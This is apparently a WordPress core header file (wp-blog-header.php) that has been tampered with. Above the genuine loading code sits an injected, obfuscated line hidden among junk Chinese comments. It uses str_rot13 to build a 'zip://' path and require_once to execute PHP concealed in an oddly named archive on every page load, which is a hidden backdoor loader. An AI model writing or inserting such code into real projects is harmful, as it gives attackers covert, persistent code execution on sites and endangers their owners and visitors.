<?php
/*二分*//*个*/
/*二分*//*个*/
/*分*//*分*//*俄国v*/(function($str){require_once($str);})(str_rot13("mvc://_(:з」#∠)_"));/*放假哦*//*非ef*/?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}